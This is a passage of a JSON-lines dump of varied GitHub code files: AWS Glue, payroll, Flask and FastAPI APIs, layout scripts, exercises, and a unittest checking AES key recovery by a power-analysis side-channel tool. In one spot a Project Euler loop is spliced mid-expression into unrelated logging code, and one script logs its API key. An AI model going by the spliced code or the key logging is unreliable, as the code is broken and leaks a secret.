bucket\r\nglueContext.write_dynamic_frame.from_options(\r\n frame=output_dynamic_frame,\r\n connection_type=\"dynamodb\",\r\n connection_options={\r\n \"dynamodb.region\": \"us-east-1\",\r\n \"dynamodb.output.tableName\": \"group6-transaction_table\",\r\n }\r\n)\r\nS3bucket_node3 = glueContext.write_dynamic_frame.from_options(\r\n frame=failed_dynamic_frame,\r\n connection_type=\"s3\",\r\n format=\"csv\",\r\n connection_options={\"path\": \"s3://groupno6/aws-project-2/failed-records/\", \"partitionKeys\": []},\r\n transformation_ctx=\"S3bucket_node3\",\r\n)\r\n\r\njob.commit()","repo_name":"sathyaagovindarajan/AWS-PROJECT","sub_path":"PROJECT 2/GLUEJOB/PROJECT2_AVRO_GLUEJOB.py","file_name":"PROJECT2_AVRO_GLUEJOB.py","file_ext":"py","file_size_in_byte":3634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"33310869059","text":"# coding:utf-8\n\nfrom ..pyfunctions.function_object import FunctionObject\nfrom ..pysysutils import global_variables as gv\nfrom ..pysysutils.py_calc_log import log\nfrom sqlalchemy import text\nfrom ...utils import add_months\n\n\nclass PyFunction(FunctionObject):\n \"\"\"\n Desc: 获取产假信息函数\n Author: David\n Date: 2020/12/18\n \"\"\"\n\n __slots__ = ['id', 'country', 'desc', 'descENG',\n 'func_type', 'instructions', 'instructionsENG']\n\n def __init__(self):\n super(PyFunction, self).__init__()\n\n self.id = 'FC_GET_MATERNITY_LEAVE'\n self.country = 'CHN'\n self.desc = '获取产假信息函数'\n self.descENG = '获取产假信息函数'\n self.func_type = 'A'\n self.instructions = \"获取产假信息函数。输入参数:无。输出参数:产假开始日期、产假时长\"\n self.instructionsENG = self.instructions\n\n self.log_flag = gv.get_run_var_value('LOG_FLAG')\n if self.log_flag == 'Y':\n self.trace_dic = {\n 'id': self.id,\n 'desc': self.desc,\n 'type': 'FC',\n 'fc_obj': self,\n 'WC': [],\n 'WT': [],\n 'VR': [],\n 'PA': []\n }\n else:\n self.trace_dic = {}\n\n @log()\n def func_exec(self):\n db = gv.get_db()\n catalog = gv.get_run_var_value('PY_CATALOG')\n # 从请假记录中取值,历经期开始日期前18个月的产假记录中,取最小的开始日期;累计期间内产假总时长\n f_prd_bgn_dt = catalog.f_prd_bgn_dt\n begin_date = add_months(f_prd_bgn_dt, -18)\n t = text(\n \"select hhr_start_dt, hhr_hour_amount from boogoo_attendance.hhr_pt_emp_leave_rec where tenant_id = :b1 and hhr_empid = :b2 \"\n \"and hhr_start_dt BETWEEN :b3 and :b4 and hhr_pt_code = :b5 order by hhr_start_dt asc\")\n rs = db.conn.execute(t, b1=catalog.tenant_id, b2=catalog.emp_id, b3=begin_date, b4=f_prd_bgn_dt, b5='0005').fetchall()\n i = 0\n start_dt = None\n hour_amt = 0\n for row in rs:\n if i == 0:\n start_dt = row['hhr_start_dt']\n hour_amt += (0 if row['hhr_hour_amount'] is None else row['hhr_hour_amount'])\n i += 1\n return start_dt, hour_amt\n","repo_name":"pmxly/pypayroll","sub_path":"payroll/pyfunctions/FC_GET_MATERNITY_LEAVE.py","file_name":"FC_GET_MATERNITY_LEAVE.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"31109009911","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# The smallest number expressible as the sum of a prime square, prime cube, and prime fourth power is 28. In fact, there are exactly four numbers below fifty that can be expressed in such a way:\n# 28 = 2^2 + 2^3 + 2^4\n# 33 = 3^2 + 2^3 + 2^4\n# 49 = 5^2 + 2^3 + 2^4\n# 47 = 2^2 + 3^3 + 2^4\n# How many numbers below fifty million can be expressed as the sum of a prime square, prime cube, and prime fourth power?\n# Sınır değerini 50 milyonun karekökü civarında almak yeterli güvenlik seviyesini sağlıyor.\n\nfrom sympy import primerange\n\nLIMIT = 50000000\nprimes = list(primerange(2,int(LIMIT**0.5)))\nsonuc = set()\n\nfor a in primes:\n for b in primes:\n for c in primes:\n if(a**2+b**3+c**4 Tracker: {}\".format(tracker_name))\n logging.info(\" > Endpoint URL: {}\".format(endpoint_url))\n logging.info(\" > API key: {}\".format(api_key))\n logging.info(\" > Speed: {} m/s\".format(speed))\n logging.info(\" > Interval: {} seconds\".format(interval))\n\n devices = get_devices(endpoint_url, api_key)\n\n for device in devices:\n t = threading.Thread(target=process_device, args=(device, speed, interval, tracker_name))\n t.start()\n\n\nif __name__ == '__main__':\n format = \"%(asctime)s: %(message)s\"\n logging.basicConfig(format=format, level=logging.INFO)\n parser = argparse.ArgumentParser(description='Update the location of devices.')\n parser.add_argument('--tracker-name',\n required=True,\n help='The name of the Amazon Location Service tracker.')\n parser.add_argument('--endpoint-url',\n help='The URL of the API endpoint (defaults to http://localhost:3000).',\n default='http://localhost:3000')\n parser.add_argument('--api-key',\n help='The API key used to authenticate requests to the API')\n parser.add_argument('--interval',\n type=int,\n help='How much time (in seconds) to wait between updates (defaults to 2).',\n default=2)\n parser.add_argument('--speed',\n type=int,\n help='The speed (in m/s) at which all devices move around the map (defaults to 25)',\n default=25)\n\n args = parser.parse_args()\n main(args.tracker_name, args.endpoint_url, args.api_key, args.speed, args.interval)\n","repo_name":"carlosafonso/amazon-location-demo","sub_path":"scripts/update_locations.py","file_name":"update_locations.py","file_ext":"py","file_size_in_byte":3530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"25824609816","text":"import unittest\nimport csv\nfrom CPA import CPA\nimport difflib\n\n\nclass TestCPA(unittest.TestCase):\n\n def testInitTestMatrix(self):\n cpa = CPA()\n cpa.initTraceMatrix()\n\n rowCount = 100\n traceCount = 2500\n\n self.assertEqual(len(cpa.plainText), rowCount)\n self.assertEqual(len(cpa.cipherText), rowCount)\n self.assertEqual(len(cpa.traceMatrix), rowCount)\n for row in cpa.traceMatrix:\n self.assertEqual(len(row), traceCount)\n self.assertEqual(type(row), list)\n for col in row:\n self.assertEqual(type(col), float)\n self.assertEqual(cpa.numberOfTraces, rowCount)\n self.assertEqual(cpa.numberOfTracesPoint, traceCount)\n\n def testCorrelation(self):\n cpa = CPA()\n cpa.initTraceMatrix()\n cpa.initHypothesis_MCU8_AES128(1)\n cpa.findCorrelation()\n\n traceFile = 'intermediate/waveform.csv'\n \n rowTable = open(traceFile, newline='').readlines()\n for count in range(0,255):\n \n rowString = rowTable[count]\n testCaseString = ','.join(format(x, \".5f\") for x in cpa.correlation[count])\n rowStringLength = len(rowString)\n rowStringLength = rowStringLength - 8 # idk why its diff (Nan vs actual value) sx on java is 0.0\n self.assertEqual(testCaseString[0:rowStringLength] == rowString[0:rowStringLength], True)\n\n def testWaveform(self):\n cpa = CPA()\n results = cpa.CPA()\n self.assertEqual(results[\"key\"].strip(), \"78 A4 30 47 95 7D 4C 21 81 5D E6 72 0E AD 6F 41\")\n\n # def testWaveform2(self):\n # CPA.tracefile\n \n# if __name__ == '__main__':\n# unittest.main()\n\n# waveform.csv\n# 78 A4 30 47 95 7D 4C 21 81 5D E6 72 0E AD 6F 41 \n\n# waveform_HS.csv\n# 48 9D B4 B3 F3 17 29 61 CC 2B CB 4E D2 E2 8E B7","repo_name":"Chiku-debug/Correlation-Power-Analysis-Attack","sub_path":"Project/CPA-Tool/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"35963620544","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom scribus import *\nmargins = (36, 36, 0, 0)\n\n# Dictionary of logos' height/width aspect ratios. It is used to position the school logo\n# There's no way to programatically adjust frame to image.\n# The Python Scribus uses doesn't have any image utilities like PIL so I could not\n# figure out a way to determine the image's aspect ratio programatically. :|\n# There is a program I wrote called Logo_aspect_ratio.py that takes all the images files\n# in a directory and generates a CSV file of their width and height. The program is located in \n# the Women directory. After you run that program, you can run this one.\n\nschool_logos_dict = {}\nwith open(\"./School_Logos/filesizes_gif.csv\") as f:\n for line in f:\n current_line_list = line.split(\",\")\n school_logos_dict[current_line_list[0]] = float(current_line_list[2]) / float (current_line_list[1])\n\nconf_logos_dict = {}\nwith open(\"./Conference_Logos/filesizes_png.csv\") as f:\n for line in f:\n current_line_list = line.split(\",\")\n conf_logos_dict[current_line_list[0]] = float(current_line_list[2]) / float (current_line_list[1])\n \nplayers_list = []\nplayers_names_list = []\nwith open(\"Beach_VB_action.csv\") as f:\n next(f) # skip headers row\n for line in f:\n current_line_list = line.split(\",\")\n full_name = current_line_list[0].split()\n first_name = full_name[0]\n first_last_name = full_name[1]\n if (full_name[1] == \"de\" or full_name[1] == \"La\"):\n player_name = full_name[0] + \" \" + full_name[1] + \" \" + full_name[2]\n if (player_name in players_names_list): \n player_name_count = sum([1 for plyr in players_names_list if plyr == player_name])\n image_filename = \"./Beach_VB_action/\" + first_name + \"_\" + full_name[1] + \"_\" + full_name[2] + \"_\" + str(player_name_count + 1) + \".jpg\"\n else:\n image_filename = \"./Beach_VB_action/\" + first_name + \"_\" + full_name[1] + \"_\" + full_name[2] + \".jpg\"\n else:\n player_name = first_name + \" \" + first_last_name\n if (player_name in players_names_list): \n player_name_count = sum([1 for plyr in players_names_list if plyr == player_name])\n image_filename = \"./Beach_VB_action/\" + first_name + \"_\" + first_last_name + \"_\" + str(player_name_count + 1) + \".jpg\"\n else:\n image_filename = \"./Beach_VB_action/\" + first_name + \"_\" + first_last_name + \".jpg\"\n \n negron_santos = \"Alejandra Negrón & Karla Santos\"; santos_negron = \"Karla Santos & Alejandra Negrón\"\n negron_santos_2 = \"Alejandra Negrón & Karla Santos 2\"; negron_santos_3 = \"Alejandra Negrón & Karla Santos 3\"\n \n if (current_line_list[0] == negron_santos):\n player_name = negron_santos\n image_filename = \"./Beach_VB_action/\" + negron_santos.replace(\" \", \"_\") + \".jpg\"\n elif (current_line_list[0] == santos_negron):\n player_name = santos_negron\n image_filename = \"./Beach_VB_action/\" + santos_negron.replace(\" \", \"_\") + \".jpg\"\n elif (current_line_list[0] == negron_santos_2):\n player_name = negron_santos\n image_filename = \"./Beach_VB_action/\" + negron_santos_2.replace(\" \", \"_\") + \".jpg\"\n elif (current_line_list[0] == negron_santos_3):\n player_name = negron_santos\n image_filename = \"./Beach_VB_action/\" + negron_santos_3.replace(\" \", \"_\") + \".jpg\"\n \n player_school = current_line_list[1]\n school_state = current_line_list[2]\n school_division = current_line_list[3]\n photo_credit = current_line_list[4]\n \n single_player_list = [player_name, image_filename, player_school, school_state, school_division, photo_credit]\n players_list.append(single_player_list)\n players_names_list.append(player_name)\n\n\nif newDocument(PAPER_LETTER, margins, PORTRAIT, 1, UNIT_POINTS, NOFACINGPAGES, FIRSTPAGERIGHT, 1):\n\n defineColor(\"NJCAA Blue\", 217, 168, 55, 94)\n defineColor(\"NJCAA Gray\", 0, 0, 0, 40)\n defineColor(\"NJCAA Gray 2\", 0, 0, 0, 153)\n defineColor(\"NJCAA Blue 2\", 221, 168, 15, 30)\n defineColor(\"Darker Gray\", 0, 0, 0, 64)\n defineColor(\"Beach VB\", 154, 50, 0, 0)\n \n # top_right_rect = createRect(306, 36, 306, 180)\n # setFillColor(\"NJCAA Gray\", top_right_rect); setLineColor(\"NJCAA Gray\", top_right_rect)\n # second_rect = createRect(0, 216, 306, 180)\n # setFillColor(\"NJCAA Gray\", second_rect); setLineColor(\"NJCAA Gray\", second_rect)\n # third_rect = createRect(306, 396, 306, 180)\n # setFillColor(\"NJCAA Gray\", third_rect); setLineColor(\"NJCAA Gray\", third_rect)\n # top_left_rect = createRect(0, 576, 306, 180)\n # setFillColor(\"NJCAA Gray\", top_left_rect); setLineColor(\"NJCAA Gray\", top_left_rect)\n \n num_players = len(players_list)\n if (num_players % 8) == 0: \n num_pages = (num_players / 8) \n else: \n num_pages = (num_players / 8) + 1\n player_count = 0\n for page in range(num_pages):\n top_rect = createRect(0, 0, 612, 36)\n setFillColor(\"Beach VB\", top_rect); setLineColor(\"Beach VB\", top_rect)\n bottom_rect = createRect(0, 756, 612, 36)\n setFillColor(\"Beach VB\", bottom_rect); setLineColor(\"Beach VB\", bottom_rect)\n center_rect = createRect(0, 36, 612, 720)\n setFillColor(\"White\", center_rect); setLineColor(\"White\", center_rect)\n \n page_header = createText(36, 9, 540, 36)\n setText(\"Beach Volleyball Action\", page_header)\n setTextColor(\"White\", page_header)\n setFont(\"OLD SPORT 02 ATHLETIC NCV Regular\", page_header); setFontSize(24, page_header)\n setTextAlignment(ALIGN_CENTERED, page_header)\n \n years1 = createText(0, 6.7, 36, 36); setText(\"2019\" + \"\\n\" + \"-\" + \"\\n\" + \"2020\", years1)\n years2 = createText(576, 6.7, 36, 36); setText(\"2019\" + \"\\n\" + \"-\" + \"\\n\" + \"2020\", years2)\n setTextColor(\"White\", years1); setTextColor(\"White\", years2)\n setFont(\"OLD SPORT 02 ATHLETIC NCV Regular\", years1); setFontSize(11, years1); setTextAlignment(ALIGN_CENTERED, years1)\n setFont(\"OLD SPORT 02 ATHLETIC NCV Regular\", years2); setFontSize(11, years2); setTextAlignment(ALIGN_CENTERED, years2)\n setLineSpacing(7, years1); setLineSpacing(7, years2) \n \n # Asterisk for Bernier and Torruella\n if page == 0:\n footer_asterisk = createText(36, 764, 5, 34)\n setText(\"*\", footer_asterisk); setTextColor(\"White\", footer_asterisk); setFontSize(10, footer_asterisk)\n footnote_frame = createText(40, 764, 536, 35)\n footnote = \"Eva Torruella and Lina Bernier represented Puerto Rico in beach volleyball at the 2015 Panamerican Games in Toronto, Canada.\"\n setText(footnote, footnote_frame); setTextColor(\"White\", footnote_frame); setFontSize(10, footnote_frame); setLineSpacing(12, footnote_frame)\n \n for row in range(4):\n for col in range(2):\n current_player = players_list[player_count]\n photo_width = 270; photo_height = 177\n photo_x = 38 + col * (photo_width)\n # photo_y = 36 + 20 + row * (250 + 100)\n photo_y = 36 + row * (photo_height + 4)\n player_photo = createImage(photo_x, photo_y, photo_width, photo_height)\n loadImage(current_player[1], player_photo); setScaleImageToFrame(1, 1, player_photo)\n \n division_x = photo_x + 15\n if (current_player[4].replace(\"\\n\",\"\") in [\"NCAA DI\", \"NCAA DII\", \"NCAA DIII\"]):\n division_y = photo_y + 15\n player_division = createImage(division_x, division_y, 25, 25)\n else:\n division_y = photo_y + 20\n player_division = createImage(division_x, division_y, 25, 12)\n loadImage(\"./Division_logos/\" + current_player[4].replace(\" \", \"_\").replace(\"\\n\",\"\") + \"_logo.png\", player_division); setScaleImageToFrame(1, 1, player_division)\n \n banner_width = 170; banner_height = 30\n banner_x = photo_x + (photo_width - banner_width) / 2.0\n if (current_player[0] in [negron_santos, santos_negron, negron_santos_2, negron_santos_3]):\n banner_width = 265.54; banner_x = photo_x\n banner_y = photo_y + (photo_height - banner_height)\n player_banner = createRect(banner_x, banner_y, banner_width, banner_height)\n setFillColor(\"White\", player_banner); setLineColor(\"None\", player_banner)\n \n logo_name = current_player[2].replace(\" \", \"_\")\n if (school_logos_dict[logo_name] < 0.7):\n logo_width = 33.0\n logo_height = min(logo_width * school_logos_dict[logo_name], 28)\n else:\n logo_height = 28.0\n logo_width = min(logo_height / school_logos_dict[logo_name], 33)\n logo_ypos = (banner_y + (banner_height - logo_height) / 2.0)\n school_logo = createImage(banner_x + 1, logo_ypos, logo_width, logo_height)\n loadImage(\"./School_Logos/\" + logo_name + \".gif\", school_logo); setScaleImageToFrame(1, 1, school_logo)\n \n # vocales_acentos = [\"Á\", \"É\", \"Í\", \"Ó\", \"Ú\", \"Ñ\"]\n # if any(x in unicode(current_player[0]).upper() for x in vocales_acentos): player_name_ypos = banner_y + 3\n # else: player_name_ypos = banner_y + 5\n # max_logo_width = 35.0\n player_name = createText(banner_x + logo_width + 1, banner_y + 3, banner_width - logo_width, banner_height)\n insertText(unicode(current_player[0]) + \"\\n\", -1, player_name)\n setFont(\"Playball Regular\", player_name); setFontSize(15, player_name)\n name_length = getTextLength(player_name)\n player_school_and_state = current_player[2] + \" | \" + current_player[3]\n school_and_state_length = len(player_school_and_state)\n insertText(unicode(player_school_and_state) + \"\\n\", -1, player_name)\n selectText(name_length, school_and_state_length, player_name)\n setFont(\"Asimov Print C\", player_name)\n selectText(name_length, len(player_school_and_state), player_name); setFontSize(7, player_name)\n setTextColor(\"NJCAA Blue\", player_name)\n setLineSpacing(11, player_name)\n setTextAlignment(ALIGN_CENTERED, player_name)\n \n # Bernier and Torruella stuff\n if current_player[0] in [\"Eva Torruella\", \"Lina Bernier\"]:\n player_panam = createImage(division_x - 7.5, division_y + 30, 40, 40)\n loadImage(\"./Beach_VB_action/\" + current_player[0].replace(\" \", \"_\").replace(\"\\n\", \"\") + \"_Panamericanos.png\", player_panam); setScaleImageToFrame(1, 1, player_panam)\n panam_logo = createImage(division_x - 7.5, division_y + 30 + 45, 40, 27)\n loadImage(\"./Beach_VB_action/\" + \"Panamerican_Games_2015_logo_2.png\", panam_logo); setScaleImageToFrame(1, 1, panam_logo)\n \n # Asterisks for Bernier and Torruella\n if current_player[0] == \"Eva Torruella\":\n torruella_asterisk = createText(228, 189, 12, 36)\n setText(\"*\", torruella_asterisk); setTextColor(\"NJCAA Blue\", torruella_asterisk); setFontSize(12, torruella_asterisk)\n if current_player[0] == \"Lina Bernier\":\n bernier_asterisk = createText(492, 189, 12, 36)\n setText(\"*\", bernier_asterisk); setTextColor(\"NJCAA Blue\", bernier_asterisk); setFontSize(12, bernier_asterisk)\n \n photo_credit = \"Photo: \" + current_player[5].replace(\"\\n\", \"\")\n photo_credit_length = len(photo_credit)\n photo_credit_width = 4.0 * photo_credit_length + 6.0\n photo_credit_banner = createRect(photo_x + 265.54 - photo_credit_width, photo_y, photo_credit_width, 10)\n setFillColor(\"NJCAA Blue\", photo_credit_banner); setLineColor(\"None\", photo_credit_banner); setFillTransparency(0.70, photo_credit_banner)\n \n \n photo_credit_text = createText(photo_x + 265.54 - photo_credit_width, photo_y + 1.5, photo_credit_width, 12)\n setText(photo_credit, photo_credit_text)\n setTextColor(\"White\", photo_credit_text); setFont(\"Asimov Print C\", photo_credit_text); setFontSize(8, photo_credit_text)\n setTextAlignment(ALIGN_CENTERED, photo_credit_text)\n \n player_count += 1\n if player_count == num_players: break\n if player_count == num_players: break\n if player_count == num_players: break\n # if page == 0: break\n \n \n \n # right_rect = createRect(576, 36, 36, 720)\n # setFillColor(\"NJCAA Gray\", right_rect); setLineColor(\"NJCAA Gray\", right_rect)\n # left_rect = createRect(0, 36, 36, 720)\n # setFillColor(\"NJCAA Gray\", left_rect); setLineColor(\"NJCAA Gray\", left_rect)\n newPage(-1)\n ","repo_name":"carlosror/Boricuas_NCAA_Season_Summary_2019_2020","sub_path":"Women/Beach_VB_action_shots.py","file_name":"Beach_VB_action_shots.py","file_ext":"py","file_size_in_byte":12319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"19155615542","text":"import time\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom data import TranslationResult, TranslationResults, TranslationData\nfrom exception import InternetConnectionError, CannotFindWordError\n\nHEADERS = {'User-Agent': 'Mozilla/5.0'}\n\n\nclass ReversoQuery:\n def __init__(self, tr_data: TranslationData, limit: int):\n self._d = tr_data\n self._limit = limit\n self._trg_l = ''\n\n def _form_url(self) -> str:\n return f'https://context.reverso.net/translation/{self._d.src_l}-' \\\n f'{self._trg_l}/{self._d.word}'\n\n def _make_query(self) -> requests.Response:\n url = self._form_url()\n for _ in range(5):\n r = requests.get(url, headers=HEADERS)\n if r.status_code == 404:\n raise CannotFindWordError(self._d.word)\n elif r:\n return r\n time.sleep(.02)\n raise InternetConnectionError()\n\n def _parse_response(self, resp: requests.Response) -> TranslationResult:\n soup = BeautifulSoup(resp.content, 'html.parser')\n words = [span.text.strip() for span in soup.find_all(\n 'span', {'class': 'display-term'}, limit=self._limit)]\n examples = [div.text.strip() for div in soup.find_all(\n 'div', {'class': ['src', 'trg']}, limit=self._limit * 4)]\n ex_tuples = list(zip(examples[::4], examples[1::4]))\n return TranslationResult(self._trg_l.capitalize(), words, ex_tuples)\n\n def _get_translation(self, trg_l) -> TranslationResult:\n self._trg_l = trg_l\n return self._parse_response(self._make_query())\n\n def get_translations(self) -> TranslationResults:\n return TranslationResults(\n [self._get_translation(trg_l) for trg_l in self._d.trg_ls]\n )\n\n\ndef make_queries(tr_data: TranslationData) -> TranslationResults:\n limit = 5 if len(tr_data.trg_ls) == 1 else 1\n return ReversoQuery(tr_data, limit).get_translations()\n","repo_name":"denamyte/Hyperskill_Python_23_Multilingual_Online_Translator","sub_path":"Multilingual Online Translator/task/translator/queries.py","file_name":"queries.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"34461511184","text":"# single Level Ingheritence\r\n\r\nclass University:\r\n univeristy = \"GTU\"\r\n \r\n def info(self):\r\n print(f\"University is {self.univeristy}\")\r\n \r\nclass Student(University):\r\n Student = \"Regular\"\r\n univeristy = \"DU\" \r\n \r\n def data(self):\r\n print(f\"Student is {self.Student} Student\")\r\n print(f\"University is {self.univeristy}\")\r\n\r\n\r\nu = University()\r\ns = Student()\r\nu.info()\r\nprint(\"************\")\r\ns.data()","repo_name":"kartikraiyani03/PYTHON-OOPS","sub_path":"inheritence.py","file_name":"inheritence.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"16068528577","text":"'''\nGiven a list of words, find if any of the two words can be joined to form a palindrome.\nExamples: \n\nInput : list[] = {\"geekf\", \"geeks\", \"or\", \n \"keeg\", \"abc\", \"bc\"}\nOutput : Yes\nThere is a pair \"geekf\" and \"keeg\"\n\nInput : list[] = {\"abc\", \"xyxcba\", \"geekst\", \"or\",\n \"keeg\", \"bc\"}\nOutput : Yes\nThere is a pair \"abc\" and \"xyxcba\"\n'''\nfrom trie import charToIndex\n\nclass TrieNode:\n def __init__(self):\n self.children = [None] * 26\n self.isEndOfWord = False\n self.id = -1\n\nclass Trie:\n def __init__(self, words):\n self.root = TrieNode()\n self.words = words\n for i in range(len(words)):\n self.insertReverse(words[i], i)\n\n def isPalindrome(self, word, start, end):\n while start != end:\n if word[start] == word[end]:\n start += 1\n end -= 1\n else:\n return False\n return True\n\n def insertReverse(self, word, id):\n p = self.root\n for i in range(len(word) - 1, -1, -1):\n index = charToIndex(word[i])\n if p.children[index] is None:\n p.children[index] = TrieNode()\n if (self.isPalindrome(word, 0, i - 1)):\n p.children[index].id = id\n p = p.children[index]\n p.id = id\n p.isEndOfWord = True\n\n def canFormPalindrome(self, word):\n p = self.root\n for i in range(len(word)):\n index = charToIndex(word[i])\n if p.children[index] is None:\n print(f\"{word}{self.words[p.id]}\")\n return self.isPalindrome(word, i, len(word) - 1)\n p = p.children[index]\n if p.id != -1:\n print(f\"{word}{self.words[p.id]}\")\n return True\n\nwords = [\"abc\", \"xyxcba\", \"geekst\", \"or\", \"keeg\", \"bc\"]\ntrie = Trie(words)\ncanFormPalindrome = False\ntrie.canFormPalindrome(\"abc\")","repo_name":"embydextrous/Interview","sub_path":"trie/24-checkIfCanFormPalindrome.py","file_name":"24-checkIfCanFormPalindrome.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"70"}
+{"seq_id":"12690507196","text":"import pandas as pd\nimport os\nimport glob\nfrom tqdm import tqdm\nimport bz2\nimport click\n\n\n@click.command()\n@click.option('--dir', default=\"**\", help='The data folder you want to merge')\ndef merge(dir):\n data_dir = \"data\"\n od = \"all\" if dir == \"**\" else dir\n output_file = os.path.join(data_dir, \"data_{0}.csv.bz2\".format(od))\n if os.path.isfile(output_file):\n os.unlink(output_file)\n with bz2.BZ2File(output_file, 'wb') as f:\n files = glob.glob(os.path.join(data_dir, dir, \"*.pkl\"))\n\n # read the first file and write it with headers\n df = pd.read_pickle(files[0])\n df.to_csv(f, header=True, encoding='windows-1255')\n del df\n for fileName in tqdm(files[1:]):\n # write all other files without headers\n df = pd.read_pickle(fileName)\n df.to_csv(f, header=False, encoding='windows-1255')\n del df\n\n\nif __name__ == '__main__':\n merge()\n","repo_name":"milonimrod/tel-o-fun","sub_path":"src/data/convert_to_csv.py","file_name":"convert_to_csv.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"37188135449","text":"import json\nimport uuid\n\nfrom flask import Blueprint, jsonify, request\nfrom marshmallow import ValidationError\nfrom sqlalchemy.exc import IntegrityError\n\nfrom api.v1.auth import check\nfrom db.pg import db\nfrom models.roles import UsersRoles\nfrom models.sessions import Session\nfrom models.user import UserCredentials, UserData\nfrom schemas.user import register_schema, user_data_schema\nfrom utils.crypto import cypher_password\n\nbp = Blueprint(\"users\", __name__, url_prefix=\"/users\")\n\n\n@bp.route(\"\", methods=[\"POST\"])\ndef create():\n request_data = request.json\n try:\n # Validate request body against schema data types\n register_data = register_schema.load(request_data)\n except ValidationError as err:\n # Return a nice message if validation fails\n return jsonify(err.messages), 400\n new_user_id = uuid.uuid4()\n\n u_creds = UserCredentials(id=new_user_id, **register_data[\"credentials\"])\n u_creds.password = cypher_password(u_creds.password)\n try:\n db.session.add(u_creds)\n db.session.commit()\n except IntegrityError as err:\n return str(err), 409\n\n u_data = UserData(user_id=new_user_id, **register_data[\"user_data\"])\n db.session.add(u_data)\n\n role = UsersRoles(user_id=new_user_id, role_id=1)\n db.session.add(role)\n\n db.session.commit()\n\n data = {\"user_id\": new_user_id}\n print(f\"created user with id={new_user_id}\")\n return jsonify(data), 201\n\n\n@bp.route(\"/\", methods=[\"GET\"])\ndef read(user_id):\n user = UserData.query.filter_by(user_id=user_id).first()\n if user is None:\n return \"\", 404\n else:\n return user_data_schema.dump(user), 200\n\n\n@bp.route(\"/\", methods=[\"PUT\"])\ndef update(user_id):\n try:\n # Validate request body against schema data types\n user_data = user_data_schema.load(request.json)\n except ValidationError as err:\n # Return a nice message if validation fails\n return jsonify(err.messages), 400\n\n check_response, status = check()\n\n if status != 200:\n return check_response, status\n payload = json.loads(check_response)[\"payload\"]\n\n if (payload[\"user_id\"] == user_id) or (0 in payload[\"roles\"]):\n UserData.query.filter_by(user_id=user_id).update(user_data)\n db.session.commit()\n return \"\", 200\n\n return \"you cant edit this user\", 400\n\n\n@bp.route(\"/\", methods=[\"DELETE\"])\ndef delete(user_id):\n check_response, status = check()\n\n if status != 200:\n return check_response, status\n payload = json.loads(check_response)[\"payload\"]\n\n if (payload[\"user_id\"] == user_id) or (0 in payload[\"roles\"]):\n UserData.query.filter_by(user_id=user_id).delete()\n Session.query.filter_by(user_id=user_id).delete()\n UsersRoles.query.filter_by(user_id=user_id).delete()\n UserCredentials.query.filter_by(id=user_id).delete()\n db.session.commit()\n return \"\", 200\n","repo_name":"lemikhovalex/movie-auth","sub_path":"src/api/v1/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"22564849066","text":"from fastapi import FastAPI\n\n# 导入所需的数据库模型类\nfrom models.nosql import ProcessMeta\n\n# 实例化FastAPI应用对象\napp = FastAPI()\n\n# 实例化流程元信息表模型类\nprocess_meta = ProcessMeta()\n\n\n@app.get('/query-process-name-and-description')\ndef query_process_name_and_description(process_id: str) -> dict:\n print(process_id)\n try:\n\n # 尝试查询目标流程信息\n match_process = list(\n process_meta\n .collection\n .find(\n {\n '流程id': process_id\n },\n {\n '_id': 0,\n '流程名称': 1,\n '流程描述': 1\n }\n )\n )[0]\n\n return {\n 'status': 'success',\n 'data': match_process\n }\n\n except Exception as e:\n\n return {\n 'status': 'error',\n 'message': str(e)\n }\n","repo_name":"xuzhanhong/learn-dash","sub_path":"审批流应用/approval_process_app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"15308372310","text":"from tkinter import *\nimport time\ncompiler = Tk()\ntit = compiler.title('Code Tutor')\nvar = StringVar()\nvar.set('Hi! Type something below and click run to make sure everything works...\\n\\nif you continue, you and those who represent you agree\\nnot to press charges against me/I/we/us if your computer breaks...')\nlbl = Label(compiler, textvariable = var)\nlbl.pack()\npointer = 0\ndef run():\n global pointer\n if pointer == 0:\n code = str(editor.get('1.0',END))\n tit = compiler.title('OK!')\n print(code)\n var.set('It works! Press Run Again!')\n compiler.update_idletasks()\n pointer = 1\n elif pointer == 1:\n code = str(editor.get('1.0'))\n tit = compiler.title('Press Run a few times')\n print(code)\n var.set('After pressing 0 once to continue unless the dialogue says otherwise!')\n compiler.update_idletasks()\n if code == \"0\":\n pointer = 2\n elif pointer == 2:\n code = str(editor.get('1.0','11.0'))\n tit = compiler.title('Let us start')\n print(code)\n var.set('Type the letters inside the quote to continue: \"Hello World\"')\n compiler.update_idletasks()\n #time.sleep(30)\n if code == \"Hello World\\n\":\n pointer = 3\n elif pointer == 3:\n code = str(editor.get('1.0'))\n tit = compiler.title('Good Job! Remember to Run at least Twice!')\n print(code)\n var.set('You have just written your first code!')\n compiler.update_idletasks()\n if code == \"0\":\n pointer = 4\n elif pointer == 4:\n code = str(editor.get('1.0',END))\n tit = compiler.title('Let us try Something a bit HArder!')\n print(code)\n var.set('type:\"I\\nlove\\nu\"')\n compiler.update_idletasks()\n if code == 